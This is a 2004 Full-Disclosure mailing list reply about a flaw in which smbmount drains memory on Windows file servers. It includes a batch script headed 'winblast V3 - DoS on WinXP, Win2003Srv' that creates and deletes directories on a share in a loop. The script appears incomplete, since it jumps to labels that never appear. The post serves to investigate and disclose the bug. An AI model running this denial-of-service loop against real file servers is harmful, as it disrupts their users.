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Re: [Full-Disclosure] smbmount disrupts Windows file sharing.

On Mon, 2 Feb 2004 11:56, <Glenn_Everhart@bankone.com> wrote:
> If you run a script on the windows box locally to create and
> delete all these directories then, does the paged pool also
> get used up? (I should imagine that if nothing else
> springs to mind, using cygwin to give you a familiar
> scripting language would be workable.) I don't have
> a W2003 box to try this on, but wonder
> about the local case, and the case of another windows client
> doing the same thing. Do you suppose some lock on the
> directory is being taken out and not removed (and not
> recognized when the directory is recreated)?
> Glenn Everhart

Indeed, I did transmogrify the shell script to run in Windows
as a batch file (.bat):

------------cut here-----------------------
@echo off
REM winblast V3 - DoS on WinXP, Win2003Srv
REM 2003-12-04 Steve Ladjabi, Daniel Kabs

cd K:\sharedfolder
if ERRORLEVEL 1 goto exit0

set count=0

REM using 'pathcount' directories
set pathcount=1000

echo running 'winblast v3' with %pathcount% files in loop ...
  set /a p=pathcount*2-1
  set /a stop=pathcount-1
    set dirname="wbst%p%"
    REM delete old directory if it exists
    if exist %dirname% rmdir %dirname%
    REM generating directory and exit on any error
    mkdir %dirname%
    if ERRORLEVEL 1 goto exit1
    set /a p=p-1
    set /a count=count+1
    if not "%p%" == "%stop%" goto LOOP
  echo %count% directories generated ...
goto START

echo Abort. Could not open target directory.
goto ende

echo Abort. Could not create directory: %dirname%

------------cut here-----------------------

Running this script on a Windows box that had a shared folder
mounted (e.g. W2k Prof.) did not adversely affect memory
consumption on the server.

Thus I think this problem is related to the SMB protocol
dialect "spoken" by the Samba software (smbclient).

Daniel Kabs

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